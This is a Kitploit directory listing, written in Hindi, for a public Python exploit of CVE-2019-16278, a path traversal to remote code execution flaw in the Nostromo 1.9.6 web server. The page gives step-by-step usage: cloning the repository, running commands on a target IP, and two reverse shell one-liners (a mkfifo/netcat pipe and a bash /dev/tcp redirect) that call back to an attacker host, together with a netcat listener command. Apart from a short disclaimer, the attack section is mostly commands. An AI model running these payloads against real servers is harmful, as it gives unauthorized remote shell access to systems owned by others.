Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution — एक अनप्रमाणित हमलावर सर्वर बिंदुओं को '/bin/sh' जैसी शेल फ़ाइल पर मजबूर कर सकता है और URL को सत्यापित करने में विफलता के कारण मनमाना कमांड निष्पादित कर सकता है, जो सिस्टम में मौजूद किसी भी फ़ाइल के लिए पथ ट्रैवर्सल की ओर ले जाता है। Nostromo के संस्करण जैसे 1.9.6 इस URL को सत्यापित करने में विफल रहते हैं | Kitploit
उपकरण/GitHubGitHub/cybermonkx/cve-2019-16278_nostromo-1.9.6---remote-code-execution
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubcybermonkx/cve-2019-16278_nostromo-1.9.6---remote-code-execution

CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

एक अनप्रमाणित हमलावर सर्वर बिंदुओं को '/bin/sh' जैसी शेल फ़ाइल पर मजबूर कर सकता है और URL को सत्यापित करने में विफलता के कारण मनमाना कमांड निष्पादित कर सकता है, जो सिस्टम में मौजूद किसी भी फ़ाइल के लिए पथ ट्रैवर्सल की ओर ले जाता है। Nostromo के संस्करण जैसे 1.9.6 इस URL को सत्यापित करने में विफल रहते हैं

साझा करें

POC

रिपॉजिटरी: https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git

📜 विवरण

इस रिपॉजिटरी में CVE-2019-16278 के लिए एक Python एक्सप्लॉइट है, जो Nostromo 1.9.6 (एक वेब सर्वर) में एक कमजोरी है। यह कमजोरी डायरेक्टरी ट्रैवर्सल का फायदा उठाकर लक्ष्य प्रणाली पर मनमाने कमांड निष्पादित करने के लिए रिमोट कोड एक्सीक्यूशन (RCE) की अनुमति देती है।

🚀 विशेषताएँ

  • कमजोर लक्ष्य पर कस्टम शेल कमांड निष्पादित करें।
  • रिवर्स शेल पेलोड के लिए समर्थन।
  • लक्ष्य से प्रतिक्रिया के आकार को अनुकूलित करने की क्षमता।

🛠️ आवश्यकताएँ

  • Python 3.x
  • एक मशीन जो Nostromo 1.9.6 चला रही है (कमजोर लक्ष्य)।
  • Netcat (nc) रिवर्स शेल पकड़ने के लिए।

⚙️ उपयोग

चरण 1: रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
cd CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

चरण 2: एक्सप्लॉइट चलाएँ

root@kitploit:~
python3 CVE-2019-16278.py -t <TARGET_IP> -p <PORT> -c "<COMMAND>" [-b <BYTES_TO_READ>]

आर्गुमेंट

आर्गुमेंटविवरणआवश्यकडिफ़ॉल्ट
-t, --targetलक्ष्य IP पताहाँकोई नहीं
-p, --portलक्ष्य पोर्टहाँकोई नहीं
-c, --commandसर्वर पर निष्पादित करने का कमांडहाँकोई नहीं
-b, --bytesप्रतिक्रिया में पढ़ने के लिए बाइट्स की संख्यानहीं4096

🧑‍💻 उदाहरण

उदाहरण 1: लक्ष्य पर whoami चलाएँ

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "whoami"

उदाहरण 2: Netcat के साथ रिवर्स शेल

चरण 1: अपनी हमलावर मशीन पर Netcat लिसनर शुरू करें:

root@kitploit:~
nc -lvnp 443

चरण 2: रिवर्स शेल पेलोड के साथ एक्सप्लॉइट निष्पादित करें:

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.5 443 > /tmp/f"

उदाहरण 3: /dev/tcp का उपयोग करके रिवर्स शेल

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "bash -i >& /dev/tcp/10.10.16.5/443 0>&1"

🔍 कमजोरी का विवरण

  • CVE: CVE-2019-16278
  • प्रभावित सॉफ्टवेयर: Nostromo 1.9.6 वेब सर्वर
  • प्रकार: डायरेक्टरी ट्रैवर्सल -> रिमोट कोड एक्सीक्यूशन

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है। इसे उन सिस्टम पर उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है। सिस्टम तक अनधिकृत पहुँच अवैध है। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें